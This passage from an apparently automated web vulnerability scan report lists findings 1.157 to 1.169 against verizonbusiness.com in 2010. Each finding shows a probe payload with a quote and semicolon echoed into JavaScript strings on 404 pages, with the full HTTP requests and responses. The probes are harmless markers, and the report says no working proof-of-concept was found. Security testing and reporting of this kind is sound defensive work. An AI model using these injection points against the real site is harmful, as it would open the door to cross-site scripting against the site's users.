Last-Modified: Wed, 17 Nov 2010 00:45:57 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40634
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products1f859";9f422dac22d/mobility/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SU
...[SNIP]...

1.157. http://www.verizonbusiness.com/Products/mobility/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33169'%3b4bebde12907 was submitted in the REST URL parameter 2. This input was echoed as 33169';4bebde12907 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility33169'%3b4bebde12907/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:46 GMT
Content-Type: text/html
Content-Length: 42301
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobility33169';4bebde12907/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.158. http://www.verizonbusiness.com/Products/mobility/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e23de"%3bf980c1c8347 was submitted in the REST URL parameter 2. This input was echoed as e23de";f980c1c8347 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobilitye23de"%3bf980c1c8347/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:35 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42299
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobilitye23de";f980c1c8347/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.159. http://www.verizonbusiness.com/Products/mobility/applications/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/applications/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 849d1'%3b22dae2fe542 was submitted in the REST URL parameter 1. This input was echoed as 849d1';22dae2fe542 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products849d1'%3b22dae2fe542/mobility/applications/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:59 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40660
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products849d1';22dae2fe542/mobility/applications/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.160. http://www.verizonbusiness.com/Products/mobility/applications/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/applications/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3aafe"%3b022906c52d was submitted in the REST URL parameter 1. This input was echoed as 3aafe";022906c52d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products3aafe"%3b022906c52d/mobility/applications/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:45 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40660
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products3aafe";022906c52d/mobility/applications/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM E
...[SNIP]...

1.161. http://www.verizonbusiness.com/Products/mobility/applications/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/applications/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e146"%3b15362627beb was submitted in the REST URL parameter 2. This input was echoed as 5e146";15362627beb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility5e146"%3b15362627beb/applications/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:13 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42327
Date: Wed, 17 Nov 2010 00:47:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobility5e146";15362627beb/applications/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS O
...[SNIP]...

1.162. http://www.verizonbusiness.com/Products/mobility/applications/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/applications/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63e89'%3b1a180dd0762 was submitted in the REST URL parameter 2. This input was echoed as 63e89';1a180dd0762 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility63e89'%3b1a180dd0762/applications/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:45 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42325
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobility63e89';1a180dd0762/applications/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.163. http://www.verizonbusiness.com/Products/mobility/applications/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/applications/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fadd0"%3bd9966f7ea03 was submitted in the REST URL parameter 3. This input was echoed as fadd0";d9966f7ea03 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/applicationsfadd0"%3bd9966f7ea03/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:24 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43676
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobility/applicationsfadd0";d9966f7ea03/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.164. http://www.verizonbusiness.com/Products/mobility/applications/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/applications/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba37d'%3b0ea0de4bc45 was submitted in the REST URL parameter 3. This input was echoed as ba37d';0ea0de4bc45 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/applicationsba37d'%3b0ea0de4bc45/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:13 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43676
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobility/applicationsba37d';0ea0de4bc45/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.165. http://www.verizonbusiness.com/Products/mobility/fixed-wireless/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/fixed-wireless/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da1a8'%3bbfbbcd1692 was submitted in the REST URL parameter 1. This input was echoed as da1a8';bfbbcd1692 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsda1a8'%3bbfbbcd1692/mobility/fixed-wireless/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:39 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40664
Date: Wed, 17 Nov 2010 00:46:40 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:39 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Productsda1a8';bfbbcd1692/mobility/fixed-wireless/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.166. http://www.verizonbusiness.com/Products/mobility/fixed-wireless/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/fixed-wireless/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a83d"%3b454b64589c7 was submitted in the REST URL parameter 1. This input was echoed as 9a83d";454b64589c7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products9a83d"%3b454b64589c7/mobility/fixed-wireless/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:22 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40666
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products9a83d";454b64589c7/mobility/fixed-wireless/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM
...[SNIP]...

1.167. http://www.verizonbusiness.com/Products/mobility/fixed-wireless/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/fixed-wireless/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdc86'%3b380c747ec31 was submitted in the REST URL parameter 2. This input was echoed as bdc86';380c747ec31 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobilitybdc86'%3b380c747ec31/fixed-wireless/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:18 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42331
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:18 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:18 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobilitybdc86';380c747ec31/fixed-wireless/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.168. http://www.verizonbusiness.com/Products/mobility/fixed-wireless/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/fixed-wireless/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5ca8"%3bf3123d85d77 was submitted in the REST URL parameter 2. This input was echoed as f5ca8";f3123d85d77 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobilityf5ca8"%3bf3123d85d77/fixed-wireless/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:53 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42329
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:53 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobilityf5ca8";f3123d85d77/fixed-wireless/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.169. http://www.verizonbusiness.com/Products/mobility/fixed-wireless/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/fixed-wireless/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5eb0"%3b9c25d9dc05 was submitted in the REST URL parameter 3. This input was echoed as f5eb0";9c25d9dc05 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/fixed-wirelessf5eb0"%3b9c25d9dc05/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
